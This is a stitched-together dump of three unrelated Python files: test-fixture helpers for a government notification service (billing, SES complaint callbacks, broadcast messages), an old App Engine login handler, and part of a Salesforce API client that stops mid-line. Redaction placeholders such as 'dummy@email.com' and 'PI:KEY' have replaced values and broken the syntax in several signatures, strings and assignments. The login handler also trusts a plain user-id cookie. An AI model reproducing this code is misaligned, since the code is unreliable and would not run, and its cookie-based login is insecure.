\'sms_sender\': sms_sender,\n \'is_default\': is_default,\n \'inbound_number_id\': inbound_number_id,\n \'archived\': archived,\n }\n service_sms_sender = ServiceSmsSender(**data)\n\n db.session.add(service_sms_sender)\n db.session.commit()\n\n return service_sms_sender\n\n\ndef create_letter_contact(\n service,\n contact_block,\n is_default=True,\n archived=False\n):\n data = {\n \'service\': service,\n \'contact_block\': contact_block,\n \'is_default\': is_default,\n \'archived\': archived,\n }\n letter_content = ServiceLetterContact(**data)\n\n db.session.add(letter_content)\n db.session.commit()\n\n return letter_content\n\n\ndef create_annual_billing(\n service_id, free_sms_fragment_limit, financial_year_start\n):\n annual_billing = AnnualBilling(\n service_id=service_id,\n free_sms_fragment_limit=free_sms_fragment_limit,\n financial_year_start=financial_year_start\n )\n db.session.add(annual_billing)\n db.session.commit()\n\n return annual_billing\n\n\ndef create_domain(domain, organisation_id):\n\n domain = Domain(domain=domain, organisation_id=organisation_id)\n\n db.session.add(domain)\n db.session.commit()\n\n return domain\n\n\ndef create_organisation(\n name=\'test_org_1\',\n active=True,\n organisation_type=None,\n domains=None,\n organisation_id=None,\n purchase_order_number=None,\n billing_contact_names=None,\n billing_contact_email_addresses=None,\n billing_reference=None,\n):\n data = {\n \'id\': organisation_id,\n \'name\': name,\n \'active\': active,\n \'organisation_type\': organisation_type,\n \'purchase_order_number\': purchase_order_number,\n \'billing_contact_names\': billing_contact_names,\n \'billing_contact_email_addresses\': billing_contact_email_addresses,\n \'billing_reference\': billing_reference,\n }\n organisation = Organisation(**data)\n dao_create_organisation(organisation)\n\n for domain in domains or []:\n create_domain(domain, organisation.id)\n\n return organisation\n\n\ndef create_invited_org_user(organisation, invited_by, dummy@email.com\'):\n invited_org_user = InvitedOrganisationUser(\n email_address=email_address,\n invited_by=invited_by,\n organisation=organisation,\n )\n save_invited_org_user(invited_org_user)\n return invited_org_user\n\n\ndef create_daily_sorted_letter(billing_day=None,\n file_name=""Notify-20180118123.rs.txt"",\n unsorted_count=0,\n sorted_count=0):\n daily_sorted_letter = DailySortedLetter(\n billing_day=billing_day or date(2018, 1, 18),\n file_name=file_name,\n unsorted_count=unsorted_count,\n sorted_count=sorted_count\n )\n\n db.session.add(daily_sorted_letter)\n db.session.commit()\n\n return daily_sorted_letter\n\n\ndef create_ft_billing(bst_date,\n template,\n *,\n provider=\'test\',\n rate_multiplier=1,\n international=False,\n rate=0,\n billable_unit=1,\n notifications_sent=1,\n postage=\'none\'\n ):\n data = FactBilling(bst_date=bst_date,\n service_id=template.service_id,\n template_id=template.id,\n notification_type=template.template_type,\n provider=provider,\n rate_multiplier=rate_multiplier,\n international=international,\n rate=rate,\n billable_units=billable_unit,\n notifications_sent=notifications_sent,\n postage=postage)\n db.session.add(data)\n db.session.commit()\n return data\n\n\ndef create_ft_notification_status(\n bst_date,\n notification_type=\'sms\',\n service=None,\n template=None,\n job=None,\n key_type=\'normal\',\n notification_status=\'delivered\',\n count=1\n):\n if job:\n template = job.template\n if template:\n service = template.service\n notification_type = template.template_type\n else:\n if not service:\n service = create_service()\n template = create_template(service=service, template_type=notification_type)\n\n data = FactNotificationStatus(\n bst_date=bst_date,\n template_id=template.id,\n service_id=service.id,\n job_id=job.id if job else uuid.UUID(int=0),\n notification_type=notification_type,\n key_type=key_type,\n notification_status=notification_status,\n notification_count=count\n )\n db.session.add(data)\n db.session.commit()\n return data\n\n\ndef create_process_time(bst_date=\'2021-03-01\', messages_total=35, messages_within_10_secs=34):\n data = FactProcessingTime(\n bst_date=bst_date,\n messages_total=messages_total,\n messages_within_10_secs=messages_within_10_secs\n )\n fact_processing_time_dao.insert_update_processing_time(data)\n\n\ndef create_service_guest_list(service, email_address=None, mobile_number=None):\n if email_address:\n guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, email_address)\n elif mobile_number:\n guest_list_user = ServiceGuestList.from_string(service.id, MOBILE_TYPE, mobile_number)\n else:\n guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, dummy@email.com\')\n\n db.session.add(guest_list_user)\n db.session.commit()\n return guest_list_user\n\n\ndef create_complaint(service=None,\n notification=None,\n created_at=None):\n if not service:\n service = create_service()\n if not notification:\n template = create_template(service=service, template_type=\'email\')\n notification = create_notification(template=template)\n\n complaint = Complaint(notification_id=notification.id,\n service_id=service.id,\n ses_feedback_id=str(uuid.uuid4()),\n complaint_type=\'abuse\',\n complaint_date=datetime.utcnow(),\n created_at=created_at if created_at else datetime.now()\n )\n db.session.add(complaint)\n db.session.commit()\n return complaint\n\n\ndef ses_complaint_callback_malformed_message_id():\n return {\n \'Signature\': \'bb\',\n \'SignatureVersion\': \'1\', \'MessageAttributes\': {}, \'MessageId\': \'PI:KEY\',\n \'UnsubscribeUrl\': \'https://sns.eu-west-1.amazonaws.com\',\n \'TopicArn\': \'arn:ses_notifications\', \'Type\': \'Notification\',\n \'Timestamp\': \'2018-06-05T14:00:15.952Z\', \'Subject\': None,\n \'Message\': \'{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\\\""Some Service\\\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""badMessageId"":""ref1"",""destination"":[dummy@email.com""]}}\', # noqa\n \'SigningCertUrl\': \'https://sns.pem\'\n }\n\n\ndef ses_complaint_callback_with_missing_complaint_type():\n """"""\n https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object\n """"""\n return {\n \'Signature\': \'bb\',\n \'SignatureVersion\': \'1\', \'MessageAttributes\': {}, \'MessageId\': \'PI:KEY\',\n \'UnsubscribeUrl\': \'https://sns.eu-west-1.amazonaws.com\',\n \'TopicArn\': \'arn:ses_notifications\', \'Type\': \'Notification\',\n \'Timestamp\': \'2018-06-05T14:00:15.952Z\', \'Subject\': None,\n \'Message\': \'{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\\\""Some Service\\\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}\', # noqa\n \'SigningCertUrl\': \'https://sns.pem\'\n }\n\n\ndef ses_complaint_callback():\n """"""\n https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object\n """"""\n return {\n \'Signature\': \'bb\',\n \'SignatureVersion\': \'1\', \'MessageAttributes\': {}, \'MessageId\': \'PI:KEY\',\n \'UnsubscribeUrl\': \'https://sns.eu-west-1.amazonaws.com\',\n \'TopicArn\': \'arn:ses_notifications\', \'Type\': \'Notification\',\n \'Timestamp\': \'2018-06-05T14:00:15.952Z\', \'Subject\': None,\n \'Message\': \'{""notificationType"":""Complaint"",""complaint"":{""complaintFeedbackType"": ""abuse"", ""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\\\""Some Service\\\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}\', # noqa\n \'SigningCertUrl\': \'https://sns.pem\'\n }\n\n\ndef ses_notification_callback():\n return \'{\\n ""Type"" : ""Notification"",\\n ""MessageId"" : ""ref1"",\' \\\n \'\\n ""TopicArn"" : ""arn:aws:sns:eu-west-1:123456789012:testing"",\' \\\n \'\\n ""Message"" : ""{\\\\""notificationType\\\\"":\\\\""Delivery\\\\"",\' \\\n \'\\\\""mail\\\\"":{\\\\""timestamp\\\\"":\\\\""2016-03-14T12:35:25.909Z\\\\"",\' \\\n \'\\\\""source\\\\"":dummy@email.com"",\' \\\n \'\\\\""sourceArn\\\\"":\\\\""arn:aws:ses:eu-west-1:123456789012:identity/testing-notify\\\\"",\' \\\n \'\\\\""sendingAccountId\\\\"":\\\\""123456789012\\\\"",\' \\\n \'\\\\""messageId\\\\"":\\\\""ref1\\\\"",\' \\\n \'\\\\""destination\\\\"":dummy@email.com""]},\' \\\n \'\\\\""delivery\\\\"":{\\\\""timestamp\\\\"":\\\\""2016-03-14T12:35:26.567Z\\\\"",\' \\\n \'\\\\""processingTimeMillis\\\\"":658,\' \\\n \'\\\\""recipients\\\\"":dummy@email.com""],\' \\\n \'\\\\""smtpResponse\\\\"":\\\\""250 2.0.0 OK 1457958926 uo5si26480932wjc.221 - gsmtp\\\\"",\' \\\n \'\\\\""reportingMTA\\\\"":\\\\""a6-238.smtp-out.eu-west-1.amazonses.com\\\\""}}"",\' \\\n \'\\n ""Timestamp"" : ""2016-03-14T12:35:26.665Z"",\\n ""SignatureVersion"" : ""1"",\' \\\n \'\\n ""Signature"" : ""X8d7eTAOZ6wlnrdVVPYanrAlsX0SMPfOzhoTEBnQqYkrNWTqQY91C0f3bxtPdUhUt\' \\\n \'PI:KEY\' \\\n \'PI:KEY\' \\\n \'PI:KEY"",\' \\\n \'\\n ""SigningCertURL"" : ""https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750\' \\\n \'dd426d95ee9390147a5624348ee.pem"",\' \\\n \'\\n ""UnsubscribeURL"" : ""https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S\' \\\n \'PI:KEY""\\n}\'\n\n\ndef create_service_data_retention(\n service,\n notification_type=\'sms\',\n days_of_retention=3\n):\n data_retention = insert_service_data_retention(\n service_id=service.id,\n notification_type=notification_type,\n days_of_retention=days_of_retention\n )\n return data_retention\n\n\ndef create_invited_user(service=None,\n to_email_address=None):\n\n if service is None:\n service = create_service()\n if to_email_address is None:\n to_email_address = dummy@email.com\'\n\n from_user = service.users[0]\n\n data = {\n \'service\': service,\n \'email_address\': to_email_address,\n \'from_user\': from_user,\n \'permissions\': \'send_messages,manage_service,manage_api_keys\',\n \'folder_permissions\': [str(uuid.uuid4()), str(uuid.uuid4())]\n }\n invited_user = InvitedUser(**data)\n save_invited_user(invited_user)\n return invited_user\n\n\ndef create_template_folder(service, name=\'foo\', parent=None):\n tf = TemplateFolder(name=name, service=service, parent=parent)\n db.session.add(tf)\n db.session.commit()\n return tf\n\n\ndef create_letter_branding(name=\'HM Government\', filename=\'hm-government\'):\n test_domain_branding = LetterBranding(name=name,\n filename=filename,\n )\n db.session.add(test_domain_branding)\n db.session.commit()\n return test_domain_branding\n\n\ndef set_up_usage_data(start_date):\n year = int(start_date.strftime(\'%Y\'))\n one_week_earlier = start_date - timedelta(days=7)\n two_days_later = start_date + timedelta(days=2)\n one_week_later = start_date + timedelta(days=7)\n one_month_later = start_date + timedelta(days=31)\n\n # service with sms and letters:\n service_1_sms_and_letter = create_service(\n service_name=\'a - with sms and letter\',\n purchase_order_number=""service purchase order number"",\n billing_contact_names=""service billing contact names"",\n dummy@email.com dummy@email.com"",\n billing_reference=""service billing reference""\n )\n letter_template_1 = create_template(service=service_1_sms_and_letter, template_type=\'letter\')\n sms_template_1 = create_template(service=service_1_sms_and_letter, template_type=\'sms\')\n create_annual_billing(\n service_id=service_1_sms_and_letter.id, free_sms_fragment_limit=10, financial_year_start=year\n )\n org_1 = create_organisation(\n name=""Org for {}"".format(service_1_sms_and_letter.name),\n purchase_order_number=""org1 purchase order number"",\n billing_contact_names=""org1 billing contact names"",\n dummy@email.com dummy@email.com"",\n billing_reference=""org1 billing reference""\n )\n dao_add_service_to_organisation(\n service=service_1_sms_and_letter,\n organisation_id=org_1.id\n )\n\n create_ft_billing(bst_date=one_week_earlier, template=sms_template_1, billable_unit=2, rate=0.11)\n create_ft_billing(bst_date=start_date, template=sms_template_1, billable_unit=2, rate=0.11)\n create_ft_billing(bst_date=two_days_later, template=sms_template_1, billable_unit=1, rate=0.11)\n\n create_ft_billing(bst_date=one_week_later, template=letter_template_1,\n notifications_sent=2, billable_unit=1, rate=.35, postage=\'first\')\n create_ft_billing(bst_date=one_month_later, template=letter_template_1,\n notifications_sent=4, billable_unit=2, rate=.45, postage=\'second\')\n create_ft_billing(bst_date=one_week_later, template=letter_template_1,\n notifications_sent=2, billable_unit=2, rate=.45, postage=\'second\')\n\n # service with emails only:\n service_with_emails = create_service(service_name=\'b - emails\')\n email_template = create_template(service=service_with_emails, template_type=\'email\')\n org_2 = create_organisation(\n name=\'Org for {}\'.format(service_with_emails.name),\n )\n dao_add_service_to_organisation(service=service_with_emails, organisation_id=org_2.id)\n\n create_ft_billing(bst_date=start_date, template=email_template, notifications_sent=10)\n\n # service with letters:\n service_with_letters = create_service(service_name=\'c - letters only\')\n letter_template_3 = create_template(service=service_with_letters, template_type=\'letter\')\n org_for_service_with_letters = create_organisation(\n name=""Org for {}"".format(service_with_letters.name),\n purchase_order_number=""org3 purchase order number"",\n billing_contact_names=""org3 billing contact names"",\n dummy@email.com dummy@email.com"",\n billing_reference=""org3 billing reference""\n )\n dao_add_service_to_organisation(service=service_with_letters, organisation_id=org_for_service_with_letters.id)\n\n create_ft_billing(bst_date=start_date, template=letter_template_3,\n notifications_sent=2, billable_unit=3, rate=.50, postage=\'first\')\n create_ft_billing(bst_date=one_week_later, template=letter_template_3,\n notifications_sent=8, billable_unit=5, rate=.65, postage=\'second\')\n create_ft_billing(bst_date=one_month_later, template=letter_template_3,\n notifications_sent=12, billable_unit=5, rate=.65, postage=\'second\')\n\n # service with letters, without an organisation:\n service_with_letters_without_org = create_service(service_name=\'d - service without org\')\n letter_template_4 = create_template(service=service_with_letters_without_org, template_type=\'letter\')\n\n create_ft_billing(bst_date=two_days_later, template=letter_template_4,\n notifications_sent=7, billable_unit=4, rate=1.55, postage=\'rest-of-world\')\n create_ft_billing(bst_date=two_days_later, template=letter_template_4,\n notifications_sent=8, billable_unit=4, rate=1.55, postage=\'europe\')\n create_ft_billing(bst_date=two_days_later, template=letter_template_4,\n notifications_sent=2, billable_unit=1, rate=.35, postage=\'second\')\n create_ft_billing(bst_date=two_days_later, template=letter_template_4,\n notifications_sent=1, billable_unit=1, rate=.50, postage=\'first\')\n\n # service with chargeable SMS, without an organisation\n service_with_sms_without_org = create_service(\n service_name=\'b - chargeable sms\',\n purchase_order_number=""sms purchase order number"",\n billing_contact_names=""sms billing contact names"",\n dummy@email.com dummy@email.com"",\n billing_reference=""sms billing reference""\n )\n sms_template = create_template(service=service_with_sms_without_org, template_type=\'sms\')\n create_annual_billing(\n service_id=service_with_sms_without_org.id, free_sms_fragment_limit=10, financial_year_start=year\n )\n create_ft_billing(bst_date=one_week_earlier, template=sms_template, rate=0.11, billable_unit=12)\n create_ft_billing(bst_date=two_days_later, template=sms_template, rate=0.11)\n create_ft_billing(bst_date=one_week_later, template=sms_template, billable_unit=2, rate=0.11)\n\n # service with SMS within free allowance\n service_with_sms_within_allowance = create_service(\n service_name=\'e - sms within allowance\'\n )\n sms_template_2 = create_template(service=service_with_sms_within_allowance, template_type=\'sms\')\n create_annual_billing(\n service_id=service_with_sms_within_allowance.id, free_sms_fragment_limit=10, financial_year_start=year\n )\n create_ft_billing(bst_date=one_week_later, template=sms_template_2, billable_unit=2, rate=0.11)\n\n # dictionary with services and orgs to return\n return {\n ""org_1"": org_1,\n ""service_1_sms_and_letter"": service_1_sms_and_letter,\n ""org_2"": org_2,\n ""service_with_emails"": service_with_emails,\n ""org_for_service_with_letters"": org_for_service_with_letters,\n ""service_with_letters"": service_with_letters,\n ""service_with_letters_without_org"": service_with_letters_without_org,\n ""service_with_sms_without_org"": service_with_sms_without_org,\n ""service_with_sms_within_allowance"": service_with_sms_within_allowance,\n }\n\n\ndef create_returned_letter(service=None, reported_at=None, notification_id=None):\n if not service:\n service = create_service(service_name=\'a - with sms and letter\')\n returned_letter = ReturnedLetter(\n service_id=service.id,\n reported_at=reported_at or datetime.utcnow(),\n notification_id=notification_id or uuid.uuid4(),\n created_at=datetime.utcnow(),\n )\n\n db.session.add(returned_letter)\n db.session.commit()\n return returned_letter\n\n\ndef create_service_contact_list(\n service=None,\n original_file_name=\'EmergencyContactList.xls\',\n row_count=100,\n template_type=\'email\',\n created_by_id=None,\n archived=False,\n):\n if not service:\n service = create_service(service_name=\'service for contact list\', user=create_user())\n\n contact_list = ServiceContactList(\n service_id=service.id,\n original_file_name=original_file_name,\n row_count=row_count,\n template_type=template_type,\n created_by_id=created_by_id or service.users[0].id,\n created_at=datetime.utcnow(),\n archived=archived,\n )\n db.session.add(contact_list)\n db.session.commit()\n return contact_list\n\n\ndef create_broadcast_message(\n template=None,\n *,\n service=None, # only used if template is not provided\n created_by=None,\n personalisation=None,\n content=None,\n status=BroadcastStatusType.DRAFT,\n starts_at=None,\n finishes_at=None,\n areas=None,\n stubbed=False\n):\n if template:\n service = template.service\n template_id = template.id\n template_version = template.version\n personalisation = personalisation or {}\n content = template._as_utils_template_with_personalisation(\n personalisation\n ).content_with_placeholders_filled_in\n elif content:\n template_id = None\n template_version = None\n personalisation = None\n content = content\n else:\n pytest.fail(\'Provide template or content\')\n\n broadcast_message = BroadcastMessage(\n service_id=service.id,\n template_id=template_id,\n template_version=template_version,\n personalisation=personalisation,\n status=status,\n starts_at=starts_at,\n finishes_at=finishes_at,\n created_by_id=created_by.id if created_by else service.created_by_id,\n areas=areas or {\'areas\': [], \'simple_polygons\': []},\n content=content,\n stubbed=stubbed\n )\n db.session.add(broadcast_message)\n db.session.commit()\n return broadcast_message\n\n\ndef create_broadcast_event(\n broadcast_message,\n sent_at=None,\n message_type=\'alert\',\n transmitted_content=None,\n transmitted_areas=None,\n transmitted_sender=None,\n transmitted_starts_at=None,\n transmitted_finishes_at=None,\n):\n b_e = BroadcastEvent(\n service=broadcast_message.service,\n broadcast_message=broadcast_message,\n sent_at=sent_at or datetime.utcnow(),\n message_type=message_type,\n transmitted_content=transmitted_content or {\'body\': \'this is an emergency broadcast message\'},\n transmitted_areas=transmitted_areas or broadcast_message.areas,\n transmitted_sender=transmitted_sender or \'www.notifications.service.gov.uk\',\n transmitted_starts_at=transmitted_starts_at,\n transmitted_finishes_at=transmitted_finishes_at or datetime.utcnow() + timedelta(hours=24),\n )\n db.session.add(b_e)\n db.session.commit()\n return b_e\n\n\ndef create_broadcast_provider_message(\n broadcast_event,\n provider,\n status=\'sending\'\n):\n broadcast_provider_message_id = uuid.uuid4()\n provider_message = BroadcastProviderMessage(\n id=broadcast_provider_message_id,\n broadcast_event=broadcast_event,\n provider=provider,\n status=status,\n )\n db.session.add(provider_message)\n db.session.commit()\n\n provider_message_number = None\n if provider == BroadcastProvider.VODAFONE:\n provider_message_number = BroadcastProviderMessageNumber(\n broadcast_provider_message_id=broadcast_provider_message_id)\n db.session.add(provider_message_number)\n db.session.commit()\n return provider_message\n\n\ndef create_webauthn_credential(\n user,\n name=\'my key\',\n *,\n credential_data=\'ABC123\',\n registration_response=\'DEF456\',\n):\n webauthn_credential = WebauthnCredential(\n user=user,\n name=name,\n credential_data=credential_data,\n registration_response=registration_response\n )\n\n db.session.add(webauthn_credential)\n db.session.commit()\n return webauthn_credential\n', '# -*- coding: utf-8 -*-\n\n\nimport os\nimport uuid\nimport datetime\nfrom google.appengine.ext import webapp\nfrom google.appengine.api import users\nfrom google.appengine.ext import db\nfrom google.appengine.api import mail\nfrom google.appengine.ext.webapp import template\n\nfrom django.utils import simplejson as json\nfrom google.appengine.api import urlfetch\nimport urllib\n\nimport conf\nimport app.FlyingClub\nimport app.CoreHandler\nfrom app.models import Comment, Crew\n\n\n\n\nclass AuthHandler(webapp.RequestHandler):\n\n\n\t###################################################################################################\n\t## Get Actions\n\t###################################################################################################\n\tdef get(self, section=None, page=None):\n\t\n\t\t#sessID = self.do_cookie_check()\n\t\tsection = \'auth\'\n\t\ttemplate_vars = {}\n\t\tApp = app.FlyingClub.FlyingClub(section, page)\n\t\ttemplate_vars[\'app\'] = App\n\t\t\n\t\t#tvars[\'appo\'] = Appo\n\t\t#tvars[\'conf\'] = conf\n\t\t#tvars[\'user\'] = None\n\t\t#template_vars[\'crewID\'] = crewID\n\t\t#f \'sessIdent\' in self.request.cookies:\n\t\t#sessIdent = self.request.cookies[\'sessIdent\'] \n\t\t#lse:\n\t\t#\tsessIdent = None\n\n\t\t## Setup Section and Page\n\t\t#if section == None:\n\t\t\t#section = ""index""\n\t\t#template_vars[\'section\'] = section\n\t\t#template_vars[\'page\'] = page\n\t\t\n\n\t\t## Get Comments\n\t\tq = db.GqlQuery(""SELECT * FROM Comment "" +\n\t\t\t\t\t\t""WHERE section = :1 "" +\n\t\t\t\t\t\t""ORDER BY dated DESC"",\n\t\t\t\t\t\tsection)\n\t\tresults = q.fetch(50)\n\t\t#template_vars[\'comments\'] = results\n\n\t\t## Application Object\n\n\t\t#template_vars[\'page_title\'] = Appo.title(""/%s/"" % section)\n\n\n\t\t## Setup User + Aauth\n\t\t#user = users.get_current_user()\n\t\t#if not user:\n\t\t#\ttemplate_vars[\'user\'] = None\n\t\t#\ttemplate_vars[\'login_url\'] = users.create_login_url(""/set_session/"")\t\t\n\t\t#else:\n\t\t#\ttemplate_vars[\'user\'] = user\n\t\t#\ttemplate_vars[\'logout_url\'] = users.create_logout_url(""/subscribe/"")\n\n\t\n\t\t## Sign In Section\n\t\t#if section == \'ssignin\' :\n\t\t#\tif sessID:\n\t\t#\t\tself.redirect(""/profile/"")\n\t\t#\t\treturn \n\t\t\t#template_vars[\'page_title\'] = \'Sign In with OpenId\'\n\n\t\t#if section == \'sdo_logout\':\n\t\t#\t\tcook_str = \'sessID=%s; expires=Fri, 31-Dec-1980 23:59:59 GMT; Path=/;\'\t% \'\'\n\t\t#\t\tself.response.headers.add_header(\t\'Set-Cookie\', \n\t\t#\t\t\t\t\t\t\t\t\t\t\tcook_str\n\t\t#\t\t)\n\t\t#\t\tself.redirect(""/"")\n\t\t#\t\treturn\n\n\n\t\t#if section == \'sprofile\':\n\t\t#\tif not sessID:\n\t\t#\t\tself.redirect(""/signin/"")\n\t\t#\t\treturn\n\t\t\t#template_vars[\'welcome\'] = True if self.request.get(""welcome"") == \'1\' else False\n\t\t\t#template_vars[\'page_title\'] = \'My Profile\'\n\t\n\t\t\n\t\tmain_template = \'%s.html\' % (section)\n\t\tpath = \'/%s/\' % (section)\n\t\t#template_vars[\'path\'] = path\n\t\n\n\t\ttemplate_path = os.path.join(os.path.dirname(__file__), \'../templates/pages/%s\' % main_template)\n\t\tself.response.out.write(template.render(template_path, template_vars))\n\n\n\n\t###################################################################################################\n\t## Post Actions\n\t###################################################################################################\n\tdef post(self, page=None):\n\n\t\tif page == \'rpx\':\n\t\t\ttoken = self.request.get(\'token\')\n\t\t\turl = \'https://rpxnow.com/api/v2/auth_info\'\n\t\t\targs = {\n\t\t\t\t\'format\': \'json\',\n\t\t\t\t\'apiKey\': conf.RPX_API_KEY,\n\t\t\t\t\'token\': token\n\t\t\t}\n\n\t\t\tr = urlfetch.fetch(\turl=url,\n\t\t\t\t\t\t\t\tpayload=urllib.urlencode(args),\n\t\t\t\t\t\t\t\tmethod=urlfetch.POST,\n\t\t\t\t\t\t\t\theaders={\'Content-Type\':\'application/x-www-form-urlencoded\'}\n\t\t\t)\n\t\t\tdata = json.loads(r.content)\n\n\t\t\tif data[\'stat\'] == \'ok\': \n\t\t\t\twelcome = 0\n\t\t\t\tunique_identifier = data[\'profile\'][\'identifier\']\n\t\t\t\t\n\t\t\t\tq = db.GqlQuery(""select * from Crew where ident= :1"", unique_identifier)\n\t\t\t\tcrew = q.get()\n\t\t\t\tif not crew:\n\t\t\t\t\tcrew = Crew(ident=unique_identifier)\n\t\t\t\t\tcrew.name = data[\'profile\'][\'preferredUsername\']\n\t\t\t\t\tif data[\'profile\'].has_key(\'email\'):\n\t\t\t\t\t\tcrew.email = data[\'profile\'][\'email\']\n\t\t\t\t\tcrew.put()\n\t\t\t\t\twelcome = 1\n\t\t\t\t\tsubject = ""New Login: %s"" % crew.name\n\t\t\t\t\tbody = ""New login on schedule""\n\t\t\t\telse:\n\t\t\t\t\tsubject = ""Return Login: %s"" % crew.name\n\t\t\t\t\tbody = ""New login on schedule""\t\t\n\n\t\t\t\tsessID = str(crew.key())\n\t\t\t\tcook_str = \'crewID=%s; expires=Fri, 31-Dec-2020 23:59:59 GMT; Path=/;\'\t% crew.id()\n\t\t\t\tself.response.headers.add_header(\t\'Set-Cookie\', \n\t\t\t\t\t\t\t\t\t\t\t\t\tcook_str\n\t\t\t\t)\n\t\t\t\tmail.send_mail(\tsender = conf.EMAIL,\n\t\t\t\t\t\t\t\t\tto = ""Dev dummy@email.com"",\n\t\t\t\t\t\t\t\t\tsubject = subject,\n\t\t\t\t\t\t\t\t\tbody = body\n\t\t\t\t)\t\t\n\t\t\t\tself.redirect(""/profile/?welcome=%s"" % welcome)\n\t\t\t\treturn\t\n\t\telse:\n\t\t\tprint section, page\n\t\t#self.redirect(""/"")\n\t\t\t\t\n\n\n\n\n\n\n\n\n\n\n\n\n\n', '""""""Core classes and exceptions for Simple-Salesforce""""""\n\n\n# has to be defined prior to login import\nDEFAULT_API_VERSION = \'29.0\'\n\n\nimport requests\nimport json\n\ntry:\n from urlparse import urlparse\nexcept ImportError:\n # Python 3+\n from urllib.parse import urlparse\nfrom simple_salesforce.login import SalesforceLogin\nfrom simple_salesforce.util import date_to_iso8601, SalesforceError\n\ntry:\n from collections import OrderedDict\nexcept ImportError:\n # Python < 2.7\n from ordereddict import OrderedDict\n\n\nclass Salesforce(object):\n """"""Salesforce Instance\n\n An instance of Salesforce is a handy way to wrap a Salesforce session\n for easy use of the Salesforce REST API.\n """"""\n def __init__(\n self, username=None, password=None, security_token=None,\n session_id=None, instance=None, instance_url=None,\n organizationId=None, sandbox=False, version=DEFAULT_API_VERSION,\n proxies=None, session=None):\n """"""Initialize the instance with the given parameters.\n\n Available kwargs\n\n Password Authentication:\n\n * username -- the Salesforce username to use for authentication\n * password -- the password for the username\n * security_token -- the security token for the username\n * sandbox -- True if you want to login to `test.salesforce.com`, False\n if you want to login to `login.salesforce.com`.\n\n Direct Session and Instance Access:\n\n * session_id -- Access token for this session\n\n Then either\n * instance -- Domain of your Salesforce instance, i.e. `na1.salesforce.com`\n OR\n * instance_url -- Full URL of your instance i.e. `https://na1.salesforce.com\n\n Universal Kwargs:\n * version -- the version of the Salesforce API to use, for example `29.0`\n * proxies -- the optional map of scheme to proxy server\n * session -- Custom requests session, created in calling code. This\n enables the use of requets Session features not otherwise\n exposed by simple_salesforce.\n\n """"""\n\n # Determine if the user passed in the optional version and/or sandbox kwargs\n self.sf_version = version\n self.sandbox = sandbox\n self.proxies = proxies\n\n # Determine if the user wants to use our username/password auth or pass in their own information\n if all(arg is not None for arg in (username, password, security_token)):\n self.auth_type = ""password""\n\n # Pass along the username/password to our login helper\n self.session_id, self.sf_instance = SalesforceLogin(\n session=session,\n username=username,\n password=password,\n security_token=security_token,\n sandbox=self.sandbox,\n sf_version=self.sf_version,\n proxies=self.proxies)\n\n elif all(arg is not None for arg in (session_id, instance or instance_url)):\n self.auth_type = ""direct""\n self.session_id = session_id\n\n # If the user provides the full url (as returned by the OAuth interface for\n # example) extract the hostname (which we rely on)\n if instance_url is not None:\n self.sf_instance = urlparse(instance_url).hostname\n else:\n self.sf_instance = instance\n\n elif all(arg is not None for arg in (username, password, organizationId)):\n self.auth_type = \'ipfilter\'\n\n # Pass along the username/password to our login helper\n self.session_id, self.sf_instance = SalesforceLogin(\n session=session,\n username=username,\n password=password,\n organizationId=organizationId,\n sandbox=self.sandbox,\n sf_version=self.sf_version,\n proxies=self.proxies)\n\n else:\n raise TypeError(\n \'You must provide login information or an instance and token\'\n )\n\n if self.sandbox:\n self.auth_site = \'https://test.salesforce.com\'\n else:\n self.auth_site = \'https://login.salesforce.com\'\n\n self.request = session or requests.Session()\n self.request.proxies = self.proxies\n self.headers = {\n \'Content-Type\': \'application/json\',\n \'Authorization\': \'Bearer \' + self.session_id,\n \'X-PrettyPrint\': \'1\'\n }\n\n self.base_url = (\'https://{instance}/services/data/v{version}/\'\n .format(instance=self.sf_instance,\n version=self.sf_version))\n self.apex_url = (\'https://{instance}/services/apexrest/\'\n .format(instance=self.sf_instance))\n\n def describe(self):\n url = self.base_url + ""sobjects""\n result = self.request.get(url, headers=self.headers)\n if result.status_code != 200:\n raise SalesforceGeneralError(url,\n \'describe\',\n result.status_code,\n result.content)\n json_result = result.json(object_pairs_hook=OrderedDict)\n if len(json_result) == 0:\n return None\n else:\n return json_result\n\n # SObject Handler\n def __getattr__(self, name):\n """"""Returns an `SFType` instance for the given Salesforce object type\n (given in `name`).\n\n The magic part of the SalesforceAPI, this function translates\n calls such as `salesforce_api_instance.Lead.metadata()` into fully\n constituted `SFType` instances to make a nice Python API wrapper\n for the REST API.\n\n Arguments:\n\n * name -- the name of a Salesforce object type, e.g. Lead or Contact\n """"""\n \n # fix to enable serialization (https://github.com/heroku/simple-salesforce/issues/60)\n if name.startswith(\'__\'):\n return super(Salesforce, self).__getattr__(name)\n\n return SFType(name, self.session_id, self.sf_instance, self.sf_version, self.proxies)\n\n # User utlity methods\n def set_password(self, user, password):\n """"""Sets the password of a user\n\n salesforce dev documentation link:\n https://www.salesforce.com/us/developer/docs/api_rest/Content/dome_sobject_user_password.htm\n\n Arguments:\n\n * user: the userID of the user to set\n * password: the new password\n """"""\n\n url = self.base_url 